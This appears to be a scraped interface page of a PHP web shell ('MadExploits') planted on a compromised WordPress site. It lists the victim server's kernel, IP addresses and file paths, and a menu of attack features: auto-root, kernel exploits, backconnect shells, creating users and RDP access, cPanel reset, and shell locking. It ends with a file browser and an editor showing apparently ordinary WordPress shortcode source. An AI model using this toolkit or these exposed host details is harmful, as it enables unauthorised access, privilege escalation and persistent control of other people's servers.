Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 3.22.66.60
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
biogenelab.eu /
public_html /
wp-includes /
[ HOME SHELL ]
Name
Size
Permission
Action
ID3
[ DIR ]
drwxrwsr-x
IXR
[ DIR ]
drwxrwsr-x
Requests
[ DIR ]
drwxrwsr-x
SimplePie
[ DIR ]
drwxrwsr-x
Text
[ DIR ]
drwxrwsr-x
certificates
[ DIR ]
drwxrwsr-x
css
[ DIR ]
drwxrwsr-x
customize
[ DIR ]
drwxrwsr-x
fonts
[ DIR ]
drwxrwsr-x
images
[ DIR ]
drwxrwsr-x
js
[ DIR ]
drwxrwsr-x
pomo
[ DIR ]
drwxrwsr-x
random_compat
[ DIR ]
drwxrwsr-x
rest-api
[ DIR ]
drwxrwsr-x
theme-compat
[ DIR ]
drwxrwsr-x
widgets
[ DIR ]
drwxrwsr-x
admin-bar.php
27.09
KB
-rwxrwxr-x
atomlib.php
11.56
KB
-rwxrwxr-x
author-template.php
15.2
KB
-rwxrwxr-x
bookmark-template.php
11.42
KB
-rwxrwxr-x
bookmark.php
13.35
KB
-rwxrwxr-x
cache.php
21.54
KB
-rwxrwxr-x
canonical.php
26.27
KB
-rwxrwxr-x
capabilities.php
23.48
KB
-rwxrwxr-x
category-template.php
50.76
KB
-rwxrwxr-x
category.php
11.7
KB
-rwxrwxr-x
class-IXR.php
2.51
KB
-rwxrwxr-x
class-feed.php
522
B
-rwxrwxr-x
class-http.php
35.52
KB
-rwxrwxr-x
class-json.php
39.52
KB
-rwxrwxr-x
class-oembed.php
29.19
KB
-rwxrwxr-x
class-phpass.php
7.15
KB
-rwxrwxr-x
class-phpmailer.php
143.34
KB
-rwxrwxr-x
class-pop3.php
20.43
KB
-rwxrwxr-x
class-requests.php
29.09
KB
-rwxrwxr-x
class-simplepie.php
87.17
KB
-rwxrwxr-x
class-smtp.php
38.55
KB
-rwxrwxr-x
class-snoopy.php
36.9
KB
-rwxrwxr-x
class-walker-category-dropdown...
2.11
KB
-rwxrwxr-x
class-walker-category.php
6.59
KB
-rwxrwxr-x
class-walker-comment.php
11.1
KB
-rwxrwxr-x
class-walker-nav-menu.php
8.23
KB
-rwxrwxr-x
class-walker-page-dropdown.php
2.28
KB
-rwxrwxr-x
class-walker-page.php
6.67
KB
-rwxrwxr-x
class-wp-admin-bar.php
16.43
KB
-rwxrwxr-x
class-wp-ajax-response.php
4.92
KB
-rwxrwxr-x
class-wp-comment-query.php
40.64
KB
-rwxrwxr-x
class-wp-comment.php
9.22
KB
-rwxrwxr-x
class-wp-customize-control.php
22.28
KB
-rwxrwxr-x
class-wp-customize-manager.php
145.64
KB
-rwxrwxr-x
class-wp-customize-nav-menus.p...
48.36
KB
-rwxrwxr-x
class-wp-customize-panel.php
9.65
KB
-rwxrwxr-x
class-wp-customize-section.php
9.93
KB
-rwxrwxr-x
class-wp-customize-setting.php
27.81
KB
-rwxrwxr-x
class-wp-customize-widgets.php
65.88
KB
-rwxrwxr-x
class-wp-dependency.php
1.64
KB
-rwxrwxr-x
class-wp-editor.php
58.52
KB
-rwxrwxr-x
class-wp-embed.php
11.8
KB
-rwxrwxr-x
class-wp-error.php
4.55
KB
-rwxrwxr-x
class-wp-feed-cache-transient....
2.64
KB
-rwxrwxr-x
class-wp-feed-cache.php
764
B
-rwxrwxr-x
class-wp-hook.php
14.12
KB
-rwxrwxr-x
class-wp-http-cookie.php
6.4
KB
-rwxrwxr-x
class-wp-http-curl.php
11.46
KB
-rwxrwxr-x
class-wp-http-encoding.php
6.29
KB
-rwxrwxr-x
class-wp-http-ixr-client.php
3.17
KB
-rwxrwxr-x
class-wp-http-proxy.php
5.82
KB
-rwxrwxr-x
class-wp-http-requests-hooks.p...
1.84
KB
-rwxrwxr-x
class-wp-http-requests-respons...
4.42
KB
-rwxrwxr-x
class-wp-http-response.php
3.02
KB
-rwxrwxr-x
class-wp-http-streams.php
14.6
KB
-rwxrwxr-x
class-wp-image-editor-gd.php
12.87
KB
-rwxrwxr-x
class-wp-image-editor-imagick....
21.47
KB
-rwxrwxr-x
class-wp-image-editor.php
11.74
KB
-rwxrwxr-x
class-wp-list-util.php
6.33
KB
-rwxrwxr-x
class-wp-locale-switcher.php
5.02
KB
-rwxrwxr-x
class-wp-locale.php
14.39
KB
-rwxrwxr-x
class-wp-matchesmapregex.php
1.87
KB
-rwxrwxr-x
class-wp-meta-query.php
22.16
KB
-rwxrwxr-x
class-wp-metadata-lazyloader.p...
5.36
KB
-rwxrwxr-x
class-wp-network-query.php
16.6
KB
-rwxrwxr-x
class-wp-network.php
10.05
KB
-rwxrwxr-x
class-wp-oembed-controller.php
5.25
KB
-rwxrwxr-x
class-wp-post-type.php
18.59
KB
-rwxrwxr-x
class-wp-post.php
5.71
KB
-rwxrwxr-x
class-wp-query.php
119.83
KB
-rwxrwxr-x
class-wp-rewrite.php
58.72
KB
-rwxrwxr-x
class-wp-role.php
2.66
KB
-rwxrwxr-x
class-wp-roles.php
6.42
KB
-rwxrwxr-x
class-wp-session-tokens.php
7.41
KB
-rwxrwxr-x
class-wp-simplepie-file.php
2.24
KB
-rwxrwxr-x
class-wp-simplepie-sanitize-ks...
1.75
KB
-rwxrwxr-x
class-wp-site-query.php
22.65
KB
-rwxrwxr-x
class-wp-site.php
7.5
KB
-rwxrwxr-x
class-wp-tax-query.php
19.34
KB
-rwxrwxr-x
class-wp-taxonomy.php
10.3
KB
-rwxrwxr-x
class-wp-term-query.php
32.49
KB
-rwxrwxr-x
class-wp-term.php
5.29
KB
-rwxrwxr-x
class-wp-text-diff-renderer-in...
712
B
-rwxrwxr-x
class-wp-text-diff-renderer-ta...
13.74
KB
-rwxrwxr-x
class-wp-theme.php
46.73
KB
-rwxrwxr-x
class-wp-user-meta-session-tok...
3
KB
-rwxrwxr-x
class-wp-user-query.php
29.17
KB
-rwxrwxr-x
class-wp-user.php
19.19
KB
-rwxrwxr-x
class-wp-walker.php
12.1
KB
-rwxrwxr-x
class-wp-widget-factory.php
3.81
KB
-rwxrwxr-x
class-wp-widget.php
17.76
KB
-rwxrwxr-x
class-wp-xmlrpc-server.php
195
KB
-rwxrwxr-x
class-wp.php
23.57
KB
-rwxrwxr-x
class.wp-dependencies.php
11.28
KB
-rwxrwxr-x
class.wp-scripts.php
14.34
KB
-rwxrwxr-x
class.wp-styles.php
9.94
KB
-rwxrwxr-x
comment-template.php
85.21
KB
-rwxrwxr-x
comment.php
99.8
KB
-rwxrwxr-x
compat.php
16.79
KB
-rwxrwxr-x
cron.php
15.57
KB
-rwxrwxr-x
date.php
34.55
KB
-rwxrwxr-x
default-constants.php
9.25
KB
-rwxrwxr-x
default-filters.php
25.16
KB
-rwxrwxr-x
default-widgets.php
2
KB
-rwxrwxr-x
deprecated.php
108.92
KB
-rwxrwxr-x
embed-template.php
344
B
-rwxrwxr-x
embed.php
42.64
KB
-rwxrwxr-x
feed-atom-comments.php
5.23
KB
-rwxrwxr-x
feed-atom.php
3.02
KB
-rwxrwxr-x
feed-rdf.php
2.61
KB
-rwxrwxr-x
feed-rss.php
1.22
KB
-rwxrwxr-x
feed-rss2-comments.php
3.97
KB
-rwxrwxr-x
feed-rss2.php
3.68
KB
-rwxrwxr-x
feed.php
19.07
KB
-rwxrwxr-x
formatting.php
185.8
KB
-rwxrwxr-x
functions.php
170.7
KB
-rwxrwxr-x
functions.wp-scripts.php
11.21
KB
-rwxrwxr-x
functions.wp-styles.php
7.89
KB
-rwxrwxr-x
general-template.php
123.12
KB
-rwxrwxr-x
http.php
21.69
KB
-rwxrwxr-x
kses.php
49.08
KB
-rwxrwxr-x
l10n.php
42.1
KB
-rwxrwxr-x
link-template.php
131.91
KB
-rwxrwxr-x
load.php
31.68
KB
-rwxrwxr-x
locale.php
141
B
-rwxrwxr-x
media-template.php
45.03
KB
-rwxrwxr-x
media.php
134.68
KB
-rwxrwxr-x
meta.php
36.55
KB
-rwxrwxr-x
ms-blogs.php
37.35
KB
-rwxrwxr-x
ms-default-constants.php
4.64
KB
-rwxrwxr-x
ms-default-filters.php
4.47
KB
-rwxrwxr-x
ms-deprecated.php
14.43
KB
-rwxrwxr-x
ms-files.php
2.56
KB
-rwxrwxr-x
ms-functions.php
80.63
KB
-rwxrwxr-x
ms-load.php
19.38
KB
-rwxrwxr-x
ms-settings.php
3.34
KB
-rwxrwxr-x
nav-menu-template.php
20.09
KB
-rwxrwxr-x
nav-menu.php
32.42
KB
-rwxrwxr-x
option.php
63
KB
-rwxrwxr-x
pluggable-deprecated.php
6.12
KB
-rwxrwxr-x
pluggable.php
85.84
KB
-rwxrwxr-x
plugin.php
30.55
KB
-rwxrwxr-x
post-formats.php
6.79
KB
-rwxrwxr-x
post-template.php
57.17
KB
-rwxrwxr-x
post-thumbnail-template.php
7.91
KB
-rwxrwxr-x
post.php
206.94
KB
-rwxrwxr-x
query.php
22.94
KB
-rwxrwxr-x
registration-functions.php
178
B
-rwxrwxr-x
registration.php
178
B
-rwxrwxr-x
rest-api.php
35.15
KB
-rwxrwxr-x
revision.php
20.81
KB
-rwxrwxr-x
rewrite.php
16.81
KB
-rwxrwxr-x
rss-functions.php
191
B
-rwxrwxr-x
rss.php
22.66
KB
-rwxrwxr-x
script-loader.php
67.87
KB
-rwxrwxr-x
session.php
242
B
-rwxrwxr-x
shortcodes.php
20.27
KB
-rwxrwxr-x
taxonomy.php
141.9
KB
-rwxrwxr-x
template-loader.php
2.83
KB
-rwxrwxr-x
template.php
19.14
KB
-rwxrwxr-x
theme.php
95.92
KB
-rw-r--r--
update.php
22.96
KB
-rwxrwxr-x
user.php
83.58
KB
-rwxrwxr-x
vars.php
5.22
KB
-rwxrwxr-x
version.php
617
B
-rwxrwxr-x
widgets.php
47.16
KB
-rwxrwxr-x
wlwmanifest.xml
1.02
KB
-rwxrwxr-x
wp-db.php
93.27
KB
-rwxrwxr-x
wp-diff-restful.php
4.18
KB
-rw-r--r--
wp-diff.php
661
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : shortcodes.php
<?php /** * WordPress API for creating bbcode-like tags or what WordPress calls * "shortcodes". The tag and attribute parsing or regular expression code is * based on the Textpattern tag parser. * * A few examples are below: * * [shortcode /] * [shortcode foo="bar" baz="bing" /] * [shortcode foo="bar"]content[/shortcode] * * Shortcode tags support attributes and enclosed content, but does not entirely * support inline shortcodes in other shortcodes. You will have to call the * shortcode parser in your function to account for that. * * {@internal * Please be aware that the above note was made during the beta of WordPress 2.6 * and in the future may not be accurate. Please update the note when it is no * longer the case.}} * * To apply shortcode tags to content: * * $out = do_shortcode( $content ); * * @link https://codex.wordpress.org/Shortcode_API * * @package WordPress * @subpackage Shortcodes * @since 2.5.0 */ /** * Container for storing shortcode tags and their hook to call for the shortcode * * @since 2.5.0 * * @name $shortcode_tags * @var array * @global array $shortcode_tags */ $shortcode_tags = array(); /** * Add hook for shortcode tag. * * There can only be one hook for each shortcode. Which means that if another * plugin has a similar shortcode, it will override yours or yours will override * theirs depending on which order the plugins are included and/or ran. * * Simplest example of a shortcode tag using the API: * * // [footag foo="bar"] * function footag_func( $atts ) { * return "foo = { * $atts[foo] * }"; * } * add_shortcode( 'footag', 'footag_func' ); * * Example with nice attribute defaults: * * // [bartag foo="bar"] * function bartag_func( $atts ) { * $args = shortcode_atts( array( * 'foo' => 'no foo', * 'baz' => 'default baz', * ), $atts ); * * return "foo = {$args['foo']}"; * } * add_shortcode( 'bartag', 'bartag_func' ); * * Example with enclosed content: * * // [baztag]content[/baztag] * function baztag_func( $atts, $content = '' ) { * return "content = $content"; * } * add_shortcode( 'baztag', 'baztag_func' ); * * @since 2.5.0 * * @global array $shortcode_tags * * @param string $tag Shortcode tag to be searched in post content. * @param callable $func Hook to run when shortcode is found. */ function add_shortcode($tag, $func) { global $shortcode_tags; if ( '' == trim( $tag ) ) { $message = __( 'Invalid shortcode name: Empty name given.' ); _doing_it_wrong( __FUNCTION__, $message, '4.4.0' ); return; } if ( 0 !== preg_match( '@[<>&/\[\]\x00-\x20=]@', $tag ) ) { /* translators: 1: shortcode name, 2: space separated list of reserved characters */ $message = sprintf( __( 'Invalid shortcode name: %1$s. Do not use spaces or reserved characters: %2$s' ), $tag, '& / < > [ ] =' ); _doing_it_wrong( __FUNCTION__, $message, '4.4.0' ); return; } $shortcode_tags[ $tag ] = $func; } /** * Removes hook for shortcode. * * @since 2.5.0 * * @global array $shortcode_tags * * @param string $tag Shortcode tag to remove hook for. */ function remove_shortcode($tag) { global $shortcode_tags; unset($shortcode_tags[$tag]); } /** * Clear all shortcodes. * * This function is simple, it clears all of the shortcode tags by replacing the * shortcodes global by a empty array. This is actually a very efficient method * for removing all shortcodes. * * @since 2.5.0 * * @global array $shortcode_tags */ function remove_all_shortcodes() { global $shortcode_tags; $shortcode_tags = array(); } /** * Whether a registered shortcode exists named $tag * * @since 3.6.0 * * @global array $shortcode_tags List of shortcode tags and their callback hooks. * * @param string $tag Shortcode tag to check. * @return bool Whether the given shortcode exists. */ function shortcode_exists( $tag ) { global $shortcode_tags; return array_key_exists( $tag, $shortcode_tags ); } /** * Whether the passed content contains the specified shortcode * * @since 3.6.0 * * @global array $shortcode_tags * * @param string $content Content to search for shortcodes. * @param string $tag Shortcode tag to check. * @return bool Whether the passed content contains the given shortcode. */ function has_shortcode( $content, $tag ) { if ( false === strpos( $content, '[' ) ) { return false; } if ( shortcode_exists( $tag ) ) { preg_match_all( '/' . get_shortcode_regex() . '/', $content, $matches, PREG_SET_ORDER ); if ( empty( $matches ) ) return false; foreach ( $matches as $shortcode ) { if ( $tag === $shortcode[2] ) { return true; } elseif ( ! empty( $shortcode[5] ) && has_shortcode( $shortcode[5], $tag ) ) { return true; } } } return false; } /** * Search content for shortcodes and filter shortcodes through their hooks. * * If there are no shortcode tags defined, then the content will be returned * without any filtering. This might cause issues when plugins are disabled but * the shortcode will still show up in the post or content. * * @since 2.5.0 * * @global array $shortcode_tags List of shortcode tags and their callback hooks. * * @param string $content Content to search for shortcodes. * @param bool $ignore_html When true, shortcodes inside HTML elements will be skipped. * @return string Content with shortcodes filtered out. */ function do_shortcode( $content, $ignore_html = false ) { global $shortcode_tags; if ( false === strpos( $content, '[' ) ) { return $content; } if (empty($shortcode_tags) || !is_array($shortcode_tags)) return $content; // Find all registered tag names in $content. preg_match_all( '@\[([^<>&/\[\]\x00-\x20=]++)@', $content, $matches ); $tagnames = array_intersect( array_keys( $shortcode_tags ), $matches[1] ); if ( empty( $tagnames ) ) { return $content; } $content = do_shortcodes_in_html_tags( $content, $ignore_html, $tagnames ); $pattern = get_shortcode_regex( $tagnames ); $content = preg_replace_callback( "/$pattern/", 'do_shortcode_tag', $content ); // Always restore square braces so we don't break things like <!--[if IE ]> $content = unescape_invalid_shortcodes( $content ); return $content; } /** * Retrieve the shortcode regular expression for searching. * * The regular expression combines the shortcode tags in the regular expression * in a regex class. * * The regular expression contains 6 different sub matches to help with parsing. * * 1 - An extra [ to allow for escaping shortcodes with double [[]] * 2 - The shortcode name * 3 - The shortcode argument list * 4 - The self closing / * 5 - The content of a shortcode when it wraps some content. * 6 - An extra ] to allow for escaping shortcodes with double [[]] * * @since 2.5.0 * @since 4.4.0 Added the `$tagnames` parameter. * * @global array $shortcode_tags * * @param array $tagnames Optional. List of shortcodes to find. Defaults to all registered shortcodes. * @return string The shortcode search regular expression */ function get_shortcode_regex( $tagnames = null ) { global $shortcode_tags; if ( empty( $tagnames ) ) { $tagnames = array_keys( $shortcode_tags ); } $tagregexp = join( '|', array_map('preg_quote', $tagnames) ); // WARNING! Do not change this regex without changing do_shortcode_tag() and strip_shortcode_tag() // Also, see shortcode_unautop() and shortcode.js. return '\\[' // Opening bracket . '(\\[?)' // 1: Optional second opening bracket for escaping shortcodes: [[tag]] . "($tagregexp)" // 2: Shortcode name . '(?![\\w-])' // Not followed by word character or hyphen . '(' // 3: Unroll the loop: Inside the opening shortcode tag . '[^\\]\\/]*' // Not a closing bracket or forward slash . '(?:' . '\\/(?!\\])' // A forward slash not followed by a closing bracket . '[^\\]\\/]*' // Not a closing bracket or forward slash . ')*?' . ')' . '(?:' . '(\\/)' // 4: Self closing tag ... . '\\]' // ... and closing bracket . '|' . '\\]' // Closing bracket . '(?:' . '(' // 5: Unroll the loop: Optionally, anything between the opening and closing shortcode tags . '[^\\[]*+' // Not an opening bracket . '(?:' . '\\[(?!\\/\\2\\])' // An opening bracket not followed by the closing shortcode tag . '[^\\[]*+' // Not an opening bracket . ')*+' . ')' . '\\[\\/\\2\\]' // Closing shortcode tag . ')?' . ')' . '(\\]?)'; // 6: Optional second closing brocket for escaping shortcodes: [[tag]] } /** * Regular Expression callable for do_shortcode() for calling shortcode hook. * @see get_shortcode_regex for details of the match array contents. * * @since 2.5.0 * @access private * * @global array $shortcode_tags * * @param array $m Regular expression match array * @return string|false False on failure. */ function do_shortcode_tag( $m ) { global $shortcode_tags; // allow [[foo]] syntax for escaping a tag if ( $m[1] == '[' && $m[6] == ']' ) { return substr($m[0], 1, -1); } $tag = $m[2]; $attr = shortcode_parse_atts( $m[3] ); if ( ! is_callable( $shortcode_tags[ $tag ] ) ) { /* translators: %s: shortcode tag */ $message = sprintf( __( 'Attempting to parse a shortcode without a valid callback: %s' ), $tag ); _doing_it_wrong( __FUNCTION__, $message, '4.3.0' ); return $m[0]; } /** * Filters whether to call a shortcode callback. * * Passing a truthy value to the filter will effectively short-circuit the * shortcode generation process, returning that value instead. * * @since 4.7.0 * * @param bool|string $return Short-circuit return value. Either false or the value to replace the shortcode with. * @param string $tag Shortcode name. * @param array|string $attr Shortcode attributes array or empty string. * @param array $m Regular expression match array. */ $return = apply_filters( 'pre_do_shortcode_tag', false, $tag, $attr, $m ); if ( false !== $return ) { return $return; } $content = isset( $m[5] ) ? $m[5] : null; $output = $m[1] . call_user_func( $shortcode_tags[ $tag ], $attr, $content, $tag ) . $m[6]; /** * Filters the output created by a shortcode callback. * * @since 4.7.0 * * @param string $output Shortcode output. * @param string $tag Shortcode name. * @param array|string $attr Shortcode attributes array or empty string. * @param array $m Regular expression match array. */ return apply_filters( 'do_shortcode_tag', $output, $tag, $attr, $m ); } /** * Search only inside HTML elements for shortcodes and process them. * * Any [ or ] characters remaining inside elements will be HTML encoded * to prevent interference with shortcodes that are outside the elements. * Assumes $content processed by KSES already. Users with unfiltered_html * capability may get unexpected output if angle braces are nested in tags. * * @since 4.2.3 * * @param string $content Content to search for shortcodes * @param bool $ignore_html When true, all square braces inside elements will be encoded. * @param array $tagnames List of shortcodes to find. * @return string Content with shortcodes filtered out. */ function do_shortcodes_in_html_tags( $content, $ignore_html, $tagnames ) { // Normalize entities in unfiltered HTML before adding placeholders. $trans = array( '[' => '[', ']' => ']' ); $content = strtr( $content, $trans ); $trans = array( '[' => '[', ']' => ']' ); $pattern = get_shortcode_regex( $tagnames ); $textarr = wp_html_split( $content ); foreach ( $textarr as &$element ) { if ( '' == $element || '<' !== $element[0] ) { continue; } $noopen = false === strpos( $element, '[' ); $noclose = false === strpos( $element, ']' ); if ( $noopen || $noclose ) { // This element does not contain shortcodes. if ( $noopen xor $noclose ) { // Need to encode stray [ or ] chars. $element = strtr( $element, $trans ); } continue; } if ( $ignore_html || '<!--' === substr( $element, 0, 4 ) || '<![CDATA[' === substr( $element, 0, 9 ) ) { // Encode all [ and ] chars. $element = strtr( $element, $trans ); continue; } $attributes = wp_kses_attr_parse( $element ); if ( false === $attributes ) { // Some plugins are doing things like [name] <[email]>. if ( 1 === preg_match( '%^<\s*\[\[?[^\[\]]+\]%', $element ) ) { $element = preg_replace_callback( "/$pattern/", 'do_shortcode_tag', $element ); } // Looks like we found some crazy unfiltered HTML. Skipping it for sanity. $element = strtr( $element, $trans ); continue; } // Get element name $front = array_shift( $attributes ); $back = array_pop( $attributes ); $matches = array(); preg_match('%[a-zA-Z0-9]+%', $front, $matches); $elname = $matches[0]; // Look for shortcodes in each attribute separately. foreach ( $attributes as &$attr ) { $open = strpos( $attr, '[' ); $close = strpos( $attr, ']' ); if ( false === $open || false === $close ) { continue; // Go to next attribute. Square braces will be escaped at end of loop. } $double = strpos( $attr, '"' ); $single = strpos( $attr, "'" ); if ( ( false === $single || $open < $single ) && ( false === $double || $open < $double ) ) { // $attr like '[shortcode]' or 'name = [shortcode]' implies unfiltered_html. // In this specific situation we assume KSES did not run because the input // was written by an administrator, so we should avoid changing the output // and we do not need to run KSES here. $attr = preg_replace_callback( "/$pattern/", 'do_shortcode_tag', $attr ); } else { // $attr like 'name = "[shortcode]"' or "name = '[shortcode]'" // We do not know if $content was unfiltered. Assume KSES ran before shortcodes. $count = 0; $new_attr = preg_replace_callback( "/$pattern/", 'do_shortcode_tag', $attr, -1, $count ); if ( $count > 0 ) { // Sanitize the shortcode output using KSES. $new_attr = wp_kses_one_attr( $new_attr, $elname ); if ( '' !== trim( $new_attr ) ) { // The shortcode is safe to use now. $attr = $new_attr; } } } } $element = $front . implode( '', $attributes ) . $back; // Now encode any remaining [ or ] chars. $element = strtr( $element, $trans ); } $content = implode( '', $textarr ); return $content; } /** * Remove placeholders added by do_shortcodes_in_html_tags(). * * @since 4.2.3 * * @param string $content Content to search for placeholders. * @return string Content with placeholders removed. */ function unescape_invalid_shortcodes( $content ) { // Clean up entire string, avoids re-parsing HTML. $trans = array( '[' => '[', ']' => ']' ); $content = strtr( $content, $trans ); return $content; } /** * Retrieve the shortcode attributes regex. * * @since 4.4.0 * * @return string The shortcode attribute regular expression */ function get_shortcode_atts_regex() { return '/([\w-]+)\s*=\s*"([^"]*)"(?:\s|$)|([\w-]+)\s*=\s*\'([^\']*)\'(?:\s|$)|([\w-]+)\s*=\s*([^\s\'"]+)(?:\s|$)|"([^"]*)"(?:\s|$)|(\S+)(?:\s|$)/'; } /** * Retrieve all attributes from the shortcodes tag. * * The attributes list has the attribute name as the key and the value of the * attribute as the value in the key/value pair. This allows for easier * retrieval of the attributes, since all attributes have to be known. * * @since 2.5.0 * * @param string $text * @return array|string List of attribute values. * Returns empty array if trim( $text ) == '""'. * Returns empty string if trim( $text ) == ''. * All other matches are checked for not empty(). */ function shortcode_parse_atts($text) { $atts = array(); $pattern = get_shortcode_atts_regex(); $text = preg_replace("/[\x{00a0}\x{200b}]+/u", " ", $text); if ( preg_match_all($pattern, $text, $match, PREG_SET_ORDER) ) { foreach ($match as $m) { if (!empty($m[1])) $atts[strtolower($m[1])] = stripcslashes($m[2]); elseif (!empty($m[3])) $atts[strtolower($m[3])] = stripcslashes($m[4]); elseif (!empty($m[5])) $atts[strtolower($m[5])] = stripcslashes($m[6]); elseif (isset($m[7]) && strlen($m[7])) $atts[] = stripcslashes($m[7]); elseif (isset($m[8])) $atts[] = stripcslashes($m[8]); } // Reject any unclosed HTML elements foreach( $atts as &$value ) { if ( false !== strpos( $value, '<' ) ) { if ( 1 !== preg_match( '/^[^<]*+(?:<[^>]*+>[^<]*+)*+$/', $value ) ) { $value = ''; } } } } else { $atts = ltrim($text); } return $atts; } /** * Combine user attributes with known attributes and fill in defaults when needed. * * The pairs should be considered to be all of the attributes which are * supported by the caller and given as a list. The returned attributes will * only contain the attributes in the $pairs list. * * If the $atts list has unsupported attributes, then they will be ignored and * removed from the final returned list. * * @since 2.5.0 * * @param array $pairs Entire list of supported attributes and their defaults. * @param array $atts User defined attributes in shortcode tag. * @param string $shortcode Optional. The name of the shortcode, provided for context to enable filtering * @return array Combined and filtered attribute list. */ function shortcode_atts( $pairs, $atts, $shortcode = '' ) { $atts = (array)$atts; $out = array(); foreach ($pairs as $name => $default) { if ( array_key_exists($name, $atts) ) $out[$name] = $atts[$name]; else $out[$name] = $default; } /** * Filters a shortcode's default attributes. * * If the third parameter of the shortcode_atts() function is present then this filter is available. * The third parameter, $shortcode, is the name of the shortcode. * * @since 3.6.0 * @since 4.4.0 Added the `$shortcode` parameter. * * @param array $out The output array of shortcode attributes. * @param array $pairs The supported attributes and their defaults. * @param array $atts The user defined shortcode attributes. * @param string $shortcode The shortcode name. */ if ( $shortcode ) { $out = apply_filters( "shortcode_atts_{$shortcode}", $out, $pairs, $atts, $shortcode ); } return $out; } /** * Remove all shortcode tags from the given content. * * @since 2.5.0 * * @global array $shortcode_tags * * @param string $content Content to remove shortcode tags. * @return string Content without shortcode tags. */ function strip_shortcodes( $content ) { global $shortcode_tags; if ( false === strpos( $content, '[' ) ) { return $content; } if (empty($shortcode_tags) || !is_array($shortcode_tags)) return $content; // Find all registered tag names in $content. preg_match_all( '@\[([^<>&/\[\]\x00-\x20=]++)@', $content, $matches ); $tags_to_remove = array_keys( $shortcode_tags ); /** * Filters the list of shortcode tags to remove from the content. * * @since 4.7.0 * * @param array $tag_array Array of shortcode tags to remove. * @param string $content Content shortcodes are being removed from. */ $tags_to_remove = apply_filters( 'strip_shortcodes_tagnames', $tags_to_remove, $content ); $tagnames = array_intersect( $tags_to_remove, $matches[1] ); if ( empty( $tagnames ) ) { return $content; } $content = do_shortcodes_in_html_tags( $content, true, $tagnames ); $pattern = get_shortcode_regex( $tagnames ); $content = preg_replace_callback( "/$pattern/", 'strip_shortcode_tag', $content ); // Always restore square braces so we don't break things like <!--[if IE ]> $content = unescape_invalid_shortcodes( $content ); return $content; } /** * Strips a shortcode tag based on RegEx matches against post content. * * @since 3.3.0 * * @param array $m RegEx matches against post content. * @return string|false The content stripped of the tag, otherwise false. */ function strip_shortcode_tag( $m ) { // allow [[foo]] syntax for escaping a tag if ( $m[1] == '[' && $m[6] == ']' ) { return substr($m[0], 1, -1); } return $m[1] . $m[6]; }
Close